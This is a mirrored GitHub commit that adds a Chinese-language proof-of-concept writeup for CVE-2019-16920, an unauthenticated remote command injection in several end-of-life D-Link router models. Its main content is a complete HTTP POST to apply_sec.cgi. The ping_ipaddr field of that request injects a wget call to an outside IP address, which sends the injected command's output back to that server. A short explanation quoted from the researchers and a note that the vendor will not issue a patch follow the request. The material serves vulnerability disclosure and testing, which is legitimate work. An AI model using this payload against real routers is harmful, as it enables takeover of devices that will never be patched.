mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-06-20 09:50:19 +00:00
add CVE-2019-16920-D-Link-rce
This commit is contained in:
parent
d1fe689a48
commit
62f4831de6
46
CVE-2019-16920-D-Link-rce.md
Normal file
46
CVE-2019-16920-D-Link-rce.md
Normal file
@ -0,0 +1,46 @@
|
||||
## D-Link路由器曝出RCE漏洞,牵涉多个型号
|
||||
|
||||
### 简介
|
||||
|
||||
> Fortinet旗下FortiGuard实验室的研究人员披露了D-Link路由器上的一个远程命令执行漏洞,牵涉多个型号
|
||||
|
||||
### 相关文章
|
||||
|
||||
> https://www.fortinet.com/blog/threat-research/d-link-routers-found-vulnerable-rce.html
|
||||
> https://nosec.org/home/detail/3020.html
|
||||
|
||||
### 根据作者披露的受影响型号为:
|
||||
|
||||
- DIR-655
|
||||
- DIR-866L
|
||||
- DIR-652
|
||||
- DHP-1565
|
||||
|
||||
## POC 如下
|
||||
|
||||
> 攻击者可以利用该漏洞将任意字符串发送到“PingTest”网关接口来实现命令注入。
|
||||
|
||||
```
|
||||
POST /apply_sec.cgi HTTP/1.1
|
||||
Host: 192.168.232.128
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 131
|
||||
Connection: close
|
||||
Referer: http://192.168.232.128/login_pic.asp
|
||||
Cookie: uid=1234123
|
||||
Upgrade-Insecure-Requests: 1
|
||||
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://45.76.148.31:4321/?$(echo 1234)
|
||||
```
|
||||
|
||||
> “该漏洞始于一次错误的身份验证过程。当我们要进入管理页面时,需要执行登录操作。此时,我们会对`apply_sec.cgi`页面发出`POST`请求,其中包含一个操作`ping_test`。研究后发现,我们可通过参数`ping_ipaddr`执行命令注入。虽然响应是返回登录页面,但操作`ping_test`仍然执行了,我们通过参数`ping_ipaddr`注入的命令`echo 1234`成功执行,并将结果发送回我们的服务器。”
|
||||
>
|
||||
> 
|
||||
>
|
||||
> **专家们发现,由于糟糕的身份权限检查,即使无用户权限,也可以远程执行命令。**
|
||||
|
||||
> 研究人员在9月22日向D-Link报告了漏洞,而厂商在两天后承认漏洞存在,并在三天后确认不会发布相关补丁,因为这些产品都已经到了生命周期的终点。
|
||||
|
BIN
img/46.jpeg
Normal file
BIN
img/46.jpeg
Normal file
Binary file not shown.
After Width: | Height: | Size: 15 KiB |
Loading…
x
Reference in New Issue
Block a user